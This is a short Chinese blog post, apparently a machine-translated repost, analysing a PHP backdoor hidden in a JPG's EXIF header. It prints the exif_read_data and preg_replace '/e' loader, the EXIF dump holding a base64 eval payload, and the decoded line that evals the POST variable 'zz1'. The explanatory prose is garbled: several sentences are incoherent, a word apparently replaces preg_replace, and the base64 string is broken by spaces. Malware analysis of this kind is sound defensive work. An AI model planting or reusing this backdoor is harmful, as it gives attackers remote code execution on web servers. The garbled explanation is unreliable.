首页 » 漏洞 » JPG EXIF头信息里面隐藏的恶意软件

JPG EXIF头信息里面隐藏的恶意软件

 

后门程序分为两个部分。第一部分是要读取的图像标头的 exif_read_data 函数和有些 preg_replaCe 函数来执行内容的组合。


$exif = exif_read_data(‘/homepages/Clientsitepath/images/stories/food/bun.jpg’);
preg_replace($exif[‘Make’],$exif[‘Model’],”);

这两个函数本身是无害的。Exif_read_data 通常用于读取图像和替换字符串的内容。然而,甚至有一个隐藏的和棘手的选项位置如果您传递”/ e”修饰符,它将执行 (eval),而不是只搜索替换的内容。

当我们看看 bun.jpg 文件时,我们发现后门程序的第二部分:


ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^这就是甚至用来执行 (eval) 不管传递给它的确切的修饰符。

如果我们一直看着的 EXIF 数据,我们可以看到”eval (base64_decode”里面的”模型”的标题隐藏。当你把它都放在一起时,我们可以看到发生了什么事。攻击者正在阅读的制造商和型号从 EXIF 和灌装甚至与他们的头。一旦我们修改的 $exif [‘Make’] 和 $exif [‘Model’] 为在文件中,我们得到最后后门程序:


preg_replace (“/.*/e”, ,”@ eval ( base64_decode(“aWYgKGl …”);

一旦解码,我们可以看到它只是将执行无论内容由 POST 变量 。


if (isset( $_POST[“zz1″])) { eval (stripslashes( $_POST[“zz1″]..

 

原文链接:JPG EXIF头信息里面隐藏的恶意软件,转载请注明来源!

0